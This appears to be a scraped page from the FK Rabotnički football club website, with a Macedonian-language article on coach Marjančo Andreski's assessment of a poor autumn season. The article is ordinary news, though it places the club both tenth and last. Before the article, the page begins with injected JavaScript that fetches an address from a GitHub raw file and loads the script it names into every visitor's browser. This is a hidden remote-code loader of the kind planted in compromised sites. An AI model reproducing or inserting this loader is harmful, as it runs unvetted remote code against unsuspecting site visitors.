;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Андрески: Лоша резултатска есен, Работнички не заслужува да биде на дното
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Андрески: Лоша резултатска есен, Работнички не заслужува да биде на дното

Првиот дел од сезоната Работнички не го заврши според посакувањата. По 18 одиграни кола, се наоѓа на десеттата позиција на табелата со 15 освоени бода. Тоа дефинитивно не соодветствува на амбициите, квалитетот и желбите на клубот. Но, тоа е реалноста и ќе мора позицијата да се подобри со успеси по зимската пауза.

Тренерот Марјанчо Андрески се сложува дека пласманот е под сите очекувања и дека Работнички тоа не го заслужува. На одредени натпревари можеби и играта беше подобра, но, сепак, бодовите му се лизнаа на тимот од раце.

„Ова е најлошата резултатска есен за Работнички. Клубот дефинитивно тоа не го заслужува, но тимот мора да се помири со фактот дека не успеа да освои бодови на многу натпревари. Можеби игрите и не беа толку лоши, но тоа се е залудно доколку не се освојат бодови. Ќе мораме добро да се реорганизираме и во пролетниот дел од шампионатот да биде еден сосема поинаков Работнички, кој ќе знае да победи и да освои бодови“, анализира шефот на стручниот штаб, Марјанчо Андрески.

Сезоната тимот ја стартуваше под раководство на Александар Влахо, но по десеттото коло даде оставка, а кормилото му припадна на Марјанчо Андрески. Но, Работнички целата есен ја одигра под очекувањата и ја заврши на последната позиција.